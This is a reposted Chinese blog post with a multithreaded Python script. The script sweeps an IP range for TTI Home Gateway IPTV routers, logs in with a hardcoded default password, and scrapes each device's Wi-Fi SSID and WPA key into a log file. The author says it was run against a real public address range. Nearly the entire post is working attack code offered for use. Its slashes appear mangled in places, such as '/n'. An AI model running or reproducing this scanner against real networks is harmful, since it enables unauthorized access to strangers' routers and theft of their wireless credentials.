转载

批量获取TTI Home Gateway宽频IPTV的wifi的ssid和密码脚本

这个漏洞主要是关于设备存在默认口令的问题，我这里用python模拟401登录认证后请求对应的页面就可以获取到wifi的ssid和密码，这里是脚本的代码，很简单

#!/usr/bin/env python # coding=utf-8 # code by 92ez.com # last modify time 2015-08-08 09:59 import Queue from threading import Thread import time import re import os import subprocess import urllib2 #ip to num def ip2num(ip):  ip = [int(x) for x in ip.split('.')]  return ip[0] << 24 | ip[1] << 16 | ip[2] << 8 | ip[3] #num to ip def num2ip(num):  return '%s.%s.%s.%s' % ((num & 0xff000000) >> 24,        (num & 0x00ff0000) >> 16,        (num & 0x0000ff00) >> 8,        num & 0x000000ff) #get all ips list between start ip and end ip def ip_range(start, end):  return [num2ip(num) for num in range(ip2num(start), ip2num(end) + 1) if num & 0xff] #main function def bThread(iplist):  SETTHREAD = raw_input('Thread: ')  print '[Note] Running.../n'  threadl = []  queue = Queue.Queue()  hosts = iplist  for host in hosts:   queue.put(host)  threadl = [tThread(queue) for x in xrange(0, int(SETTHREAD))]  for t in threadl:   t.start()  for t in threadl:   t.join() #create thread class tThread(Thread):  def __init__(self, queue):   Thread.__init__(self)   self.queue = queue  def run(self):   global PORT   while not self.queue.empty():    host = self.queue.get()    try:     #print host     checkTTI(host,PORT)    except:     continue def checkTTI(host,port):  aimurl = "http://"+host+":"+port+"/ssid.cgi"  username = 'login'  password = 'gzcatvnet'  auth = urllib2.HTTPBasicAuthHandler()  auth.add_password('', aimurl, username, password)  opener = urllib2.build_opener(auth, urllib2.CacheFTPHandler)  urllib2.install_opener(opener)  try:   data = urllib2.urlopen(aimurl,timeout = 5)   htmlcontent = data.read()   data.close()   resssid = re.findall(r'<input id=/"tmp_ssidid/" value=/"(.+?)/" size=/"16/" maxlength=/"16/">',htmlcontent)   reskey = re.findall(r'<input name=/"wl_wpa_psk/" value=/"(.+?)/" size=/"32/" maxlength=/"32/" type=/"password/" >',htmlcontent)   #print log   print host +" SSID: CandyTime_"+resssid[0].encode('utf8')+ ' KEY: '+reskey[0].encode('utf8')   #write to log file   try:    LOGFILE.write(host +" SSID: CandyTime_"+resssid[0].encode('utf8')+ ' KEY: '+reskey[0].encode('utf8')+'/n')    LOGFILE.flush()   finally:    LOGFILE.flush()   except:   pass if __name__ == '__main__':  print '/n########### Hunt the TTI Home Gateway ##########/n'  print '    Author 92ez.com'  print '    Last modify 2015-08-08 09:59/n'  print '################################################/n'  #   global PORT  PORT = '80'  global LOGFILE  LOGFILE = open(os.path.abspath('.')+'/TTI_KEY.log', 'w+')  startIp = raw_input('Start IP: ')  endIp = raw_input('End IP: ')  iplist = ip_range(startIp, endIp)  print '/n[Note] Will scan '+str(len(iplist))+" host.../n"  bThread(iplist)

当然，扫描的网段可能比较有限，因为这种设备一般都有区域性，每个省所使用的设备可能不同。博主这里测试的网段是119.32.2.*到119.36.1.1。扫描完成后结果自动保存到文本文件